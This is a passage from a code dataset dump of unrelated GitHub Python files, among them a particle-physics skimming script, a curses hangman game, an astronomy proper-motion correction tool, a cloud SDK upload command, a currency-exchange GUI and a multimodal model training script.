Args:\n file: input files of datasets\n arg: the string attached to the end of the file names\n\n Returns:\n\n \"\"\"\n redirector = chooseRedirector(arg)\n pathToFile = redirector + arg.fileName\n print (\"Running on: %s\" % pathToFile)\n\n datasetFile = Dataset(arg.fileName)\n inFile = datasetFile.fileName\n print(\"inFile: %s\" %inFile)\n print(\"self.type = %s\" %datasetFile.type)\n if datasetFile.type == \"mc\":\n OutDir = \"NanoAOD_v5/MC\" + datasetFile.year + \"/\" + datasetFile.primaryName\n elif datasetFile.type == \"data\":\n OutDir = \"NanoAOD_V5/Data/\" + datasetFile.primaryName\n else:\n print(\"Dataset type is undefined; expected 'mc' or 'data' ; none of these were given\")\n return -1\n print(\"OutDir: %s\" % OutDir)\n\n thePostFix = \"_v\"\n p99 = PostProcessor(\".\",\n [pathToFile],\n cut=\"nJet > 3 && ( nMuon >0 || nElectron >0 ) \",\n modules=[PfJetsSkimmer(eventLimit=arg.eventLimit)],\n postfix=thePostFix,\n provenance=True,\n #branchsel=\"/user/nistylia/CMSSW_9_4_10/src/TopBrussels/RemoteWork/myInFiles/kd_branchsel.txt\",\n #outputbranchsel=\"/user/nistylia/CMSSW_9_4_10/src/TopBrussels/RemoteWork/myInFiles/kd_branchsel.txt\",\n )\n print(p99.inputFiles)\n t0 = time.time()\n p99.run()\n if 'TMPDIR' in os.environ:\n if os.environ['TMPDIR'] == os.environ['PWD']:\n print(\"We are in the temporary directory, so need to copy files in pnfs\")\n cmdString = \"gfal-copy -f file://$TMPDIR/{0}{1}.root srm://maite.iihe.ac.be:8443/pnfs/iihe/cms/store/user/$USER/{2}/{0}.root\".format(inFile, thePostFix, OutDir)\n print(cmdString)\n os.system(cmdString)\n t1 = time.time()\n proc = os.getpid()\n print(\">>> Elapsed time {0:7.1f} s by process id: {1}\".format((t1 - t0), proc))\n\n else:\n print(\"This is a permanent directory so we save in current directory\")\n\ndef main(args):\n \"\"\" This is where the input files are chosen and the PostProcessor runs \"\"\"\n skimmer(args)\n\n\nif __name__ == '__main__':\n t2 = time.time()\n main(args)\n t3 = time.time()\n print(\">>>>> Total Elapsed time {0:7.1f} s \".format((t3 - t2)))\n","repo_name":"NikHoffStyl/SLJets_FourTopNanoVersion","sub_path":"Ana/scripts/qsub/SkimDASAndSave2pnfs/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":6614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"10363202616","text":"#!/usr/bin/env python\n\nimport random\nimport curses\nimport traceback\nimport sys\nimport re\n\n# Define the hangman drawing function\ndef draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress):\n temp=max_incorrect_guesses/12\n screen.clear()\n screen.addstr(0, 0, '_______ ')\n screen.addstr(1, 0, '| |')\n screen.addstr(2, 0, '|') \n screen.addstr(3, 0, '|')\n screen.addstr(4, 0, '|')\n screen.addstr(5, 0, '|')\n screen.addstr(6, 0, '|')\n screen.addstr(7, 0, '|')\n screen.addstr(8, 0, '|')\n screen.addstr(9, 0, '-------')\n if incorrect_guesses>0:\n screen.addstr(2, 6, 'O')\n if incorrect_guesses>temp:\n screen.addstr(3, 6, '|')\n if incorrect_guesses>2*temp:\n screen.addstr(4, 6, '|')\n if incorrect_guesses>3*temp:\n screen.addstr(4, 5, '/')\n if incorrect_guesses>4*temp:\n screen.addstr(4, 7, '\\\\')\n if incorrect_guesses>5*temp:\n screen.addstr(5, 6, '|')\n if incorrect_guesses>6*temp:\n screen.addstr(6, 5, '/')\n if incorrect_guesses>7*temp:\n screen.addstr(6, 7, '\\\\')\n if incorrect_guesses>8*temp:\n screen.addstr(7, 4, '/')\n if incorrect_guesses>9*temp:\n screen.addstr(7, 8, '\\\\')\n if incorrect_guesses>10*temp:\n screen.addstr(8, 3, '/')\n if incorrect_guesses>11*temp:\n screen.addstr(8, 9, '\\\\')\n\n\n screen.addstr(11, 0, ' '.join(['Available letters:'] + [l.upper() if l not in guesses else '_' for l in 'abcdefghijklmnopqrstuvwxyz']))\n screen.addstr(14, 0, ' '.join(progress))\n screen.addstr(16, 0, f'Wrong guesses left: {max_incorrect_guesses - incorrect_guesses}')\n screen.refresh()\n\ndef main(max_incorrect_guesses=12):\n # Load words from the file\n with open('words') as f:\n words = f.read().splitlines()\n\n # Filter words to include only those with 5-25 letters\n words = [word.lower() for word in words if len(word) >= 5 and len(word) <= 25]\n\n # Initialize curses\n screen = curses.initscr()\n\n # Play the game\n play_again = True\n try:\n while play_again:\n # Reset game state\n word = random.choice(words)\n progress = ['_'] * len(word)\n counter=0\n for letter in word:\n if not re.match(\"[a-z]\", letter):\n progress[counter]=letter\n counter+=1\n guesses = set()\n incorrect_guesses = 0\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n\n # Play the game\n while '_' in progress and incorrect_guesses < max_incorrect_guesses:\n guess = ''\n while not guess.isalpha():\n guess = screen.getkey().lower()\n if guess in guesses:\n screen.addstr(12, 0, f\"You've already guessed {guess}.\")\n elif guess in word:\n screen.addstr(12, 0, 'Correct!')\n for i, letter in enumerate(word):\n if letter == guess:\n progress[i] = letter\n else:\n screen.addstr(12, 0, 'Incorrect.')\n incorrect_guesses += 1\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n guesses.add(guess)\n draw_hangman(screen, incorrect_guesses, max_incorrect_guesses, guesses, progress)\n # End the game\n if '_' not in progress:\n screen.addstr(16, 0, f'Congratulations! You guessed the word \"{word}\" with {incorrect_guesses} incorrect guesses.')\n else:\n screen.addstr(16, 0, f'Sorry, you lost. The word was \"{word}\".')\n screen.addstr(18, 0, 'Do you want to play again? (y/n)')\n play_again_input = ''\n while play_again_input not in ['y', 'n']:\n play_again_input = screen.getkey().lower()\n play_again = play_again_input == 'y'\n except:\n curses.endwin()\n traceback.print_exc()\n pass\n curses.endwin()\n\nif __name__==\"__main__\":\n max_guesses=12\n options = {}\n for i in range(1, len(sys.argv), 2):\n if sys.argv[i] in [\"-m\"]:\n try:\n max_guesses = int(sys.argv[i+1])\n except:\n print(\"Max guesses is not an integer; exiting\")\n sys.exit(1)\n main(max_guesses)\n","repo_name":"jasonbrianhall/hangman","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24371662756","text":"'''\nGiven a binary tree, you need to compute the length of the diameter of the tree. \nThe diameter of a binary tree is the length of the longest path between any two nodes in a tree. \nThis path may or may not pass through the root.\n\nhttps://leetcode.com/explore/challenge/card/30-day-leetcoding-challenge/529/week-2/3293/\n\n'''\n\nclass Solution(object):\n def diameterOfBinaryTree(self, root):\n\n self.ans = 0\n \n def depth(p):\n if not p: return 0\n left, right = depth(p.left), depth(p.right)\n self.ans = max(self.ans, left+right)\n return 1 + max(left, right)\n \n depth(root)\n return self.ans","repo_name":"arsaikia/Data_Structures_and_Algorithms","sub_path":"Data Structures and Algorithms/Python/LeetCode/Diameter of Binary Tree.py","file_name":"Diameter of Binary Tree.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6204290544","text":"import os\nimport sys\nimport numpy as np\nfrom astropy.time import Time\n\n#### \n#### INPUT THE DATE of the astrometry_ref.fits file as string of 8 numbers, e.g.: '20140526' for q2237!!!!\n##########################\nref_date = '20140526' ######## q2237: '20140526', he2149: '20211005,'\n##########################\n#### \n\n######################################################################################################\n#### DO NOT CHANGE THIS FILE FROM HERE ON - IT WILL BE ACCESSED BY aligning.py VIA interp.csh!!!! ####\n######################################################################################################\n\n# switch set by aligning.py: decides whether this correction will be applied\ntxt = open(\"gaiastarpositioncorrection_bool.txt\", \"r\")\ngaiastarpositioncorrection_bool = txt.read()\ntxt.close()\n\n#print(sys.argv) # gaiaposcorrectionforaligning.py arguments\n\n# check if this program got zero arguments:\n# --> then refalignimage.data stars will be matched with gaia stars and pm's for good.data\nif len(sys.argv) == 1: # sys.argv counts pythonfilename also as argument\n if gaiastarpositioncorrection_bool == 'True':\n # print statements can be read in alignpy_consollog.txt afterwards\n print('#########################################################')\n print('# reference and gaia star and pm matching for good.data #')\n print('#########################################################')\n \n # star matching:\n \n # load isis and gaia values:\n refaligndataRA,refaligndataDEC = np.loadtxt('refalignimage.data',usecols=(0,1),unpack=True)\n #print(refaligndataRA,refaligndataDEC)\n gaiaRA,gaiaDEC,pmRA,pmDEC,pmSN = np.loadtxt('gaia_pixelpositionandpm_list.txt',skiprows=1,usecols=(0,1,2,3,4),unpack=True)\n #print(gaiaRA,gaiaDEC,pmRA,pmDEC,pmSN)\n \n # open refalignimage.data to read it and \n # open goodpm.data to write into it, i.e. append lines with pm:\n refalignimagedata = open('refalignimage.data','r')\n datalines = refalignimagedata.readlines()\n refalignimagedata.close()\n gooddata = open('goodpm.data','w')\n \n # match stars:\n match_counter = 0\n max_distance = 15.0 # distance in pixels must be below this to have a match\n min_pmSN = 5.0 # pmSN must be above this, to correct a star for pm (is already at at least 5 from the gaialist)\n #print(len(refaligndataRA),len(gaiaRA))\n for i in range(len(refaligndataRA)):\n # starpmRA/DEC_forgooddata will be written to good.data and:\n # if no star match: pmRA = 0.0 and pmDEC = 0.0 will be added to good.data of this star.\n starpmRA_forgooddata = 0.0\n starpmDEC_forgooddata = 0.0\n distance = np.sqrt((refaligndataRA[i]-gaiaRA)**2+(refaligndataDEC[i]-gaiaDEC)**2)\n mindex = np.argmin(distance)\n if distance[mindex] < max_distance and pmSN[mindex] > min_pmSN: \n #print(distance[mindex],refaligndataRA[i],gaiaRA[mindex],refaligndataDEC[i],gaiaDEC[mindex])\n match_counter = match_counter + 1\n starpmRA_forgooddata = pmRA[mindex]\n starpmDEC_forgooddata = pmDEC[mindex]\n #print(starpmRA_forgooddata,starpmDEC_forgooddata)\n # write pm into the end of the line of the .data-file if it does not have a pm in there yet:\n #print(datalines[i])\n if str(datalines[i])[-4:-1] == 'nan':\n datalines[i] = datalines[i].strip('\\n')+' '+str(starpmRA_forgooddata)+' '+str(starpmDEC_forgooddata)+' \\n'\n #print(datalines[i])\n gooddata.writelines(datalines[i])\n \n gooddata.close()\n \n print('matched',match_counter,'of',len(refaligndataRA),'stars with a distance smaller than',max_distance,'pixels,')\n print('a pmSN of above',min_pmSN,'and written their pmRA, pmDEC and good.data to goodpm.data')\n \n else:\n os.system('cp refalignimage.data good.data')\n # nothing changed --> registering as usual:\n # the ref star positions are unchanged and copied to good data, where they are used by isis as usual\n\n\n# check if this program got one argument:\n# --> then refalignimage.data star positions will be matched with the gaia pm's for good.data\nelif len(sys.argv) == 2:\n date = str(sys.argv[1])[24:32]\n\n if gaiastarpositioncorrection_bool == 'True':\n print('#########################################################')\n print('# daily star data correction with gaia pm for good.data #')\n print('#########################################################')\n \n #### initial test: just remove some stars from the list (the test is the third line with ####)\n #### do not activate anymore, as the first 100 stars are the 'best' ones!!!\n #### os.system('tail -n +101 good.data') # remove the first 100 stars from good.data\n #### end of test\n \n # time of daily image:\n year = str(date[0:4])\n month = str(date[4:6])\n day = str(date[6:8])\n print('good.data positions will be corrected for:',day+'.'+month+'.'+year)\n utc_string = year+'-'+month+'-'+day+'T00:00:00.000' # UTC 00:00:00.000am on day-month-year\n julian_date = Time(utc_string,format='isot',scale='utc').jd # julian date\n #print(utc_string,julian_date)\n \n # time of reference image:\n ref_date_utc = str(ref_date[0:4])+'-'+str(ref_date[4:6])+'-'+str(ref_date[6:8])+'T00:00:00.000'\n julian_ref_date = Time(ref_date_utc,format='isot',scale='utc').jd\n #print(ref_date_utc,julian_ref_date)\n \n # time differnce to refernce image in days:\n time_difference = julian_date - julian_ref_date # time difference in days\n print('time difference to astrometry_ref.fits:',time_difference,'days')\n \n # position correction:\n initial_RA,initial_DEC,pm_RA_masperyear,pm_DEC_masperyear = np.loadtxt('goodpm.data',usecols=(0,1,5,6),unpack=True)\n pixel_scale = 0.387 # in arcsec/pixel\n pm_RA_pixelperday = pm_RA_masperyear/(365.25*1000*pixel_scale)\n pm_DEC_pixelperday = pm_DEC_masperyear/(365.25*1000*pixel_scale)\n RA_shift = pm_RA_pixelperday * time_difference\n DEC_shift = pm_DEC_pixelperday * time_difference\n print('maximum calculated absolute pixel shifts:',round(np.max(np.abs(RA_shift)),4),'and',round(np.max(np.abs(DEC_shift)),4))\n corrected_RA = initial_RA + RA_shift\n corrected_DEC = initial_DEC - DEC_shift\n \n # write good.data with corrected values for isis to align properly\n # open refalignimage.data to read it and \n # open goodpm.data to write into it, i.e. append lines with pm:\n refalignimagedata_day = open('refalignimage.data','r')\n datalines_day = refalignimagedata_day.readlines()\n refalignimagedata_day.close()\n gooddata_day = open('good.data','w')\n if len(datalines_day) != len(corrected_RA):\n print('fatal error')\n sys.exit('number of lines to write and number of corrected lines are not equal')\n for i in range(len(datalines_day)):\n newgooddataline = ' '.join([str(corrected_RA[i]),str(corrected_DEC[i])]+datalines_day[i].split()[2:])+'\\n'\n gooddata_day.writelines(newgooddataline)\n gooddata_day.close()\n \n print('#########################################################') # can be read in alignpy_consollog.txt afterwards\n print('# daily star data correction of good.data has finished! #')\n print('#########################################################')\n \n else:\n # the daily correction is not happening and isis registers unchanged as before without any correction\n print('#########################################################')\n print('# NO daily star data correction and good.data unchanged #')\n print('#########################################################')\n \n \n\n# if refalignimage.data did not get zero or one argument interupt everything as it must get zero or one argument!\nelse:\n print('argument error: wrong number of arguments given to gaiaposcorrectionforaligning.py!')\n sys.exit('argument error: wrong number of arguments given to gaiaposcorrectionforaligning.py!') \n","repo_name":"sorgenfrei-c95/qsoMLdiffcurves","sub_path":"gaiaposcorrectionforaligning.py","file_name":"gaiaposcorrectionforaligning.py","file_ext":"py","file_size_in_byte":8444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27781584769","text":"import json\nimport os\nfrom googlecloudsdk.api_lib.source import capture\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.core import log\n\n\nclass Upload(base.Command):\n \"\"\"Upload a source capture from given input files.\"\"\"\n\n detailed_help = {\n 'DESCRIPTION': \"\"\"\\\n This command uploads a capture of the specified source directory to\n a Google-hosted Git repository accessible with the current project's\n credentials. If the name of an existing capture is provided, the\n existing capture will be modified to include the new files.\n Otherwise a new capture will be created to hold the files.\n\n When creating a capture, this command can also produce a source\n context json file describing the capture.\n\n See https://cloud.google.com/tools/cloud-debugger/ for details on\n where to deploy the source context json file in order to enable\n Cloud Diagnostic tools to display the captured sources.\n\n \"\"\"\n }\n\n @staticmethod\n def Args(parser):\n parser.add_argument(\n 'source_location', metavar='PATH',\n help=\"\"\"\\\n The directory or archive containing the sources to capture. Files\n and subdirectories contained in that directory or archive will be\n added to the capture. If PATH refers to a file, the file may be\n a Java source jar or a zip archive.\n \"\"\")\n parser.add_argument(\n '--capture-id', metavar='ID',\n completion_resource='source.captures',\n help=\"\"\"\\\n The ID of the capture to create or modify.\n \"\"\")\n parser.add_argument(\n '--target-path', metavar='PATH', default='',\n help=\"\"\"\\\n The directory tree under source-location will be uploaded under\n target-path in the capture's directory tree.\n \"\"\")\n parser.add_argument(\n '--context-file', metavar='json-file-name',\n help=\"\"\"\\\n The name of the source context json file to produce. Defaults to\n source-contexts.json in the current directory. If context-file names\n a directory, the output file will be source-contexts.json in that\n directory.\n \"\"\")\n\n def Run(self, args):\n \"\"\"Run the capture upload command.\"\"\"\n\n mgr = capture.CaptureManager()\n result = mgr.UploadCapture(args.capture_id, args.source_location,\n args.target_path)\n if args.context_file:\n if os.path.isdir(args.context_file):\n json_filename = os.path.join(args.context_file, 'source-contexts.json')\n else:\n json_filename = args.context_file\n else:\n json_filename = 'source-contexts.json'\n with open(json_filename, 'w') as source_context_file:\n json.dump(result['source_contexts'], source_context_file)\n log.Print('Created context file {0}\\n'.format(json_filename))\n return result\n\n def Display(self, args, result):\n \"\"\"This method is called to print the result of the Run() method.\n\n Args:\n args: The arguments that command was run with.\n result: The value returned from the Run() method.\n \"\"\"\n log.Print(\n ('Created source capture {capture.id}.\\n'\n 'Wrote {files_written} files, {size_written} bytes.\\n').\n format(**result))\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/surface/source/captures/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"36374426615","text":"import pytest\nfrom lib.present import *\n\ndef test_wrap_returns_contents():\n present = Present()\n present.wrap('toys')\n result = 'toys'\n assert result == 'toys'\n\ndef test_unwrap_returns_contents():\n present = Present()\n present.wrap('kitten')\n present.unwrap()\n result = 'kitten'\n assert result == 'kitten'\n\ndef test_wrap_returns_error_for_existing_contents():\n present = Present()\n present.wrap('toys')\n with pytest.raises(Exception) as e:\n present.wrap('puppy')\n error_message = str(e.value)\n assert error_message == \"A contents has already been wrapped.\"\n\ndef test_unwrap_returns_error_for_no_contents():\n present = Present()\n with pytest.raises(Exception) as e:\n present.unwrap()\n error_message = str(e.value)\n assert error_message == \"No contents have been wrapped.\"\n\n \n","repo_name":"Sabirah42/intro_bites","sub_path":"tests/test_present.py","file_name":"test_present.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21571585263","text":"from get_exchange import *\nfrom tkinter import *\n\n\nclass GUI(get_exchange):\n def __init__(self , win):\n super().__init__()\n super().getInfoFromBOT()\n super().getInfoFromCoinmill()\n\n self.win = win\n \n self.win.title('Exchange Calculate')\n \n self.win.resizable(0,0)\n \n for i in self.exchange_dict:\n exchange_message = '{} : {}'.format(i,self.exchange_dict[i])\n Label(self.win , text = exchange_message).grid()\n \n Label(self.win , text = '\\nInsert Curren$y abbreviation to convert to NTD (Ex : USD 10)').grid()\n \n self.entry = Entry(self.win)\n self.entry.grid()\n self.entry.focus() \n \n var = StringVar()\n result = Label(self.win , textvariable = var).grid()\n \n self.button = Button(self.win , text = 'Calculate Exchange' , command = lambda : self.callback(var , self.entry.get())).grid()\n\n self.win.bind('' , lambda x: self.callback(var , self.entry.get()))\n \n Frame(self.win , width = 300 , height = 50).grid()\n \n \n \n def callback(self,var,user_input):\n tmp = user_input.split()\n if len(tmp) == 2:\n flag = 0\n current_currency = str(tmp[0]).upper()\n\n try : \n if(isinstance(float(current_currency),float)):\n output_message = 'Input error , insert again'\n flag = 1\n except :\n pass\n \n try :\n current_value = float(tmp[1])\n except:\n output_message = 'Input error , insert again'\n flag = 1\n if not flag == 1:\n output_message = super().calculate(current_currency,current_value)\n else :\n output_message = 'Input error , insert again'\n \n var.set(output_message)\n\n\n \n\n\n","repo_name":"poynt2005/get_exchange","sub_path":"legacy/GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74561251102","text":"from math import log\nimport os\nimport argparse\nimport datetime\nimport json\nimport time\nimport wandb\nimport numpy as np\nfrom pathlib import Path\n\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.utils.tensorboard import SummaryWriter\nimport timm.optim.optim_factory as optim_factory\n\nimport lavin.utils.misc as misc\nfrom lavin.utils.misc import NativeScalerWithGradNormCount as NativeScaler\nfrom engine import train_one_epoch\n\nfrom lavin.utils.datasets import ScienceQADataSet, InstrcutDataSet\nfrom lavin.mm_adaptation import LaVIN\n\n# import bitsandbytes as bnb # don't need this if you don't use paged optimizer\n\n\ndef get_args():\n parser = argparse.ArgumentParser('MAE pre-training', add_help=False)\n parser.add_argument('--batch_size', default=2, type=int, help='Batch size per GPU (effective batch size is batch_size * accum_iter * # gpus')\n parser.add_argument('--accum_iter', default=2, type=int)\n parser.add_argument('--epochs', default=20, type=int)\n parser.add_argument('--bits', default='16bit')\n\n # Model parameters\n parser.add_argument('--llama_model_path', default='./data/weights/', type=str)\n parser.add_argument('--llm_model', default='100M', type=str)\n parser.add_argument('--use_vicuna', action='store_true')\n parser.add_argument('--cpu_load', action='store_true')\n\n parser.add_argument('--adapter_type', type=str, default='attn', choices=['block', 'attn'], help='the insert position of adapter layer')\n # choices=['normal', 'router', 'router_block']\n parser.add_argument('--visual_adapter_type', type=str, default='router', help='the type of adapter layer')\n parser.add_argument('--adapter_dim', type=int, default=8, metavar='LENGTH', help='the dims of adapter layer')\n parser.add_argument('--hidden_proj', type=int, default=128, metavar='LENGTH', help='the visual adapter dim')\n parser.add_argument('--temperature', type=float, default=10., metavar='LENGTH', help='the temperature of router')\n parser.add_argument('--n_prompt', type=int, default=6, metavar='LENGTH', help='the length of visual features')\n parser.add_argument('--adapter_scale', type=float, default=1., metavar='LENGTH', help='the scales of adapter layer')\n parser.add_argument('--drop_path', type=float, default=0., metavar='LENGTH', help='drop path')\n parser.add_argument('--max_seq_len', type=int, default=512, metavar='LENGTH', help='the maximum sequence length')\n\n # Optimizer parameters\n parser.add_argument('--weight_decay', type=float, default=0.02, help='weight decay (default: 0.05)')\n parser.add_argument('--lr', type=float, default=None, metavar='LR', help='learning rate (absolute lr)')\n parser.add_argument('--clip_grad', type=float, default=None, metavar='clip gradient')\n parser.add_argument('--blr', type=float, default=9e-3, metavar='LR', help='base learning rate: absolute_lr = base_lr * total_batch_size / 256')\n parser.add_argument('--min_lr', type=float, default=0., metavar='LR', help='lower lr bound for cyclic schedulers that hit 0')\n\n parser.add_argument('--gradient_checkpointing', action='store_true', help='saving memory costs via gradient_checkpointing')\n parser.add_argument('--warmup_epochs', type=float, default=2, metavar='N', help='epochs to warmup LR')\n\n # Dataset parameters\n parser.add_argument('--data_path', default='./data/captions.json', type=str, help='dataset path')\n parser.add_argument('--output_dir', default='./outputs/debug', help='path where to save, empty for no saving')\n parser.add_argument('--log_dir', default='./outputs/debug', help='path where to tensorboard log')\n parser.add_argument('--device', default='cuda', help='device to use for training / testing')\n parser.add_argument('--seed', default=0, type=int)\n parser.add_argument('--resume', default='', help='resume from checkpoint')\n\n parser.add_argument('--start_epoch', default=0, type=int, metavar='N', help='start epoch')\n parser.add_argument('--num_workers', default=2, type=int)\n parser.add_argument('--pin_mem', action='store_true', help='Pin CPU memory in DataLoader for more efficient (sometimes) transfer to GPU.')\n parser.add_argument('--no_pin_mem', action='store_false', dest='pin_mem')\n parser.set_defaults(pin_mem=True)\n\n # distributed training parameters\n parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes')\n parser.add_argument('--local_rank', default=0, type=int)\n parser.add_argument('--rank', default=0, type=int)\n\n #datasets\n parser.add_argument('--prompt_format', type=str, default='QCM-ALE', help='prompt format template')\n parser.add_argument('--options', type=list, default=[\"A\", \"B\", \"C\", \"D\", \"E\"])\n parser.add_argument('--caption_file', type=str, default='./data/captions.json')\n parser.add_argument('--data_root', type=str, default='./data')\n parser.add_argument('--use_caption', action='store_true', help='use image captions or not')\n parser.add_argument('--wandb_enable', action='store_true', help='to use wandb')\n args = parser.parse_args()\n args.clip_grad = True\n return args\n\n\ndef main(args):\n\n misc.init_distributed_mode(args)\n if misc.is_main_process() and args.wandb_enable:\n args.output_dir = args.output_dir[:-1] if args.output_dir.endswith('/') else args.output_dir\n wandb.init(project=\"lavin-original\", name=args.output_dir.split(\"/\")[-1], dir=args.output_dir, config=vars(args))\n print('Experiment name: {}'.format(wandb.run.name))\n\n device = torch.device(args.device)\n\n # fix the seed for reproducibility\n seed = args.seed + misc.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n\n cudnn.benchmark = True\n\n dataset_train = ScienceQADataSet(args, 'train', args.llama_model_path, args.max_seq_len)\n\n num_tasks = misc.get_world_size()\n global_rank = misc.get_rank()\n sampler_train = torch.utils.data.DistributedSampler(dataset_train, num_replicas=num_tasks, rank=global_rank, shuffle=True)\n\n print(\"Sampler_train = %s\" % str(sampler_train))\n\n log_writer = None\n\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train,\n sampler=sampler_train,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n pin_memory=args.pin_mem,\n drop_last=True,\n )\n\n # define the model\n model = LaVIN(args)\n\n model.to(device)\n\n model_without_ddp = model\n\n eff_batch_size = args.batch_size * args.accum_iter * misc.get_world_size()\n\n if args.lr is None: # only base_lr is specified\n args.lr = args.blr * eff_batch_size / 256\n\n print(\"base lr: %.2e\" % (args.lr * 256 / eff_batch_size))\n print(\"actual lr: %.2e\" % args.lr)\n\n print(\"accumulate grad iterations: %d\" % args.accum_iter)\n print(\"effective batch size: %d\" % eff_batch_size)\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[misc.get_rank()], find_unused_parameters=True)\n model_without_ddp = model.module\n\n # following timm: set wd as 0 for bias and norm layers\n param_groups = optim_factory.param_groups_weight_decay(model_without_ddp, args.weight_decay)\n\n #following qlora: apply paged optimizer\n # optimizer = bnb.optim.AdamW32bit(param_groups, lr=args.lr, betas=(0.9, 0.95), is_paged=True) #\n optimizer = torch.optim.AdamW(param_groups, lr=args.lr, betas=(0.9, 0.95))\n print(optimizer)\n\n #mixed precision scaler\n loss_scaler = NativeScaler()\n\n misc.load_model(args=args, model_without_ddp=model_without_ddp, optimizer=optimizer, loss_scaler=loss_scaler)\n\n print(f\"Start training for {args.epochs} epochs\")\n start_time = time.time()\n for epoch in range(args.start_epoch, args.epochs):\n data_loader_train.sampler.set_epoch(epoch)\n\n epoch_time = time.time()\n train_stats = train_one_epoch(model, data_loader_train, optimizer, device, epoch, loss_scaler, log_writer=log_writer, args=args)\n epoch_time = time.time() - epoch_time\n print(\"Epoch time: {}\".format(str(datetime.timedelta(seconds=int(epoch_time)))))\n\n if args.output_dir:\n os.makedirs(args.output_dir, exist_ok=True)\n misc.save_model(args=args, model=model, model_without_ddp=model_without_ddp, optimizer=optimizer, loss_scaler=loss_scaler, epoch=epoch)\n print(\"Saved model and optimizer to {}\".format(args.output_dir))\n torch.distributed.barrier()\n\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=int(total_time)))\n print('Training time {}'.format(total_time_str))\n\n\nif __name__ == '__main__':\n\n args = get_args()\n main(args)\n","repo_name":"davidnvq/lavin-original","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27355521045","text":"from __future__ import absolute_import, print_function, unicode_literals\n\nimport os, sys, re, logging\n\nimport coloredlogs\n\nfrom metapub import FindIt\n\nlogging.getLogger('eutils').setLevel(logging.INFO)\n\nlogging.getLogger('metapub.findit').setLevel(logging.DEBUG)\n\ncoloredlogs.install()\n\ntry:\n filename = sys.argv[1]\nexcept:\n print(\"supply filename of PMID list as argument to this script\")\n sys.exit()\n\nre_pmid = re.compile('^\\d+$')\ndef validate_pmid(pmid):\n pmid = pmid.strip()\n if re_pmid.findall(pmid):\n return True\n else:\n return False\n\npmids = list(set(open(filename, 'r').readlines()))\n\nfor pmid in [item.strip() for item in pmids if validate_pmid(item)]:\n print(pmid)\n try:\n src = FindIt(pmid=pmid, debug=True)\n print('{src.pmid}\\t{src.doi}\\tScore: {src.doi_score}\\t{src.pma.title}'.format(src=src))\n if src.url:\n print(src.url)\n else:\n print(src.reason)\n except Exception as error:\n print(error)\n\n print()\n\n\n","repo_name":"metapub/metapub","sub_path":"bin/demo_preload_FindIt.py","file_name":"demo_preload_FindIt.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"35549360578","text":"import numpy as np\r\nimport pandas as pd\r\n\r\ndef getReutersData(validation=True, testOnly=False, testSize=10000):\r\n from sklearn.datasets import fetch_rcv1\r\n rcv1 = fetch_rcv1()\r\n \r\n train_id_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-1m.id'\r\n train_id = np.loadtxt(train_id_filename, dtype=np.int64)\r\n train_index = [np.where(rcv1.sample_id == x)[0][0] for x in train_id]\r\n X_train = rcv1.data[train_index].toarray()\r\n\r\n train_label_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-1m.lvl2'\r\n train_label = np.loadtxt(train_label_filename, dtype='str')\r\n y_train = np.array([np.where(rcv1.target_names == x)[0][0] for x in train_label])\r\n \r\n minFrequency = 2\r\n freq_cnt = pd.Series(y_train).value_counts(normalize=False)\r\n unique_train = freq_cnt[freq_cnt >= minFrequency].index\r\n selected_idx_train = [y_train[i] in unique_train for i in range(len(y_train))]\r\n X_train = X_train[selected_idx_train]\r\n y_train = y_train[selected_idx_train]\r\n\r\n test_id_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-test.id'\r\n test_id = np.loadtxt(test_id_filename, dtype=np.int64)\r\n testSize = min(testSize, len(test_id))\r\n random_test_idx = np.random.choice(range(len(test_id)), size=testSize, replace=False)\r\n test_index = [np.where(rcv1.sample_id == x)[0][0] for x in test_id[random_test_idx]]\r\n #test_index = [np.where(rcv1.sample_id == x)[0][0] for x in test_id]\r\n X_test = rcv1.data[test_index].toarray()\r\n\r\n test_label_filename = 'C:\\\\Users\\\\SJV (Work)\\\\Desktop\\\\Work\\\\Reuters\\\\rcv1_data\\\\rcv1-test.lvl2'\r\n test_label = np.loadtxt(test_label_filename, dtype='str')\r\n y_test = np.array([np.where(rcv1.target_names == x)[0][0] for x in 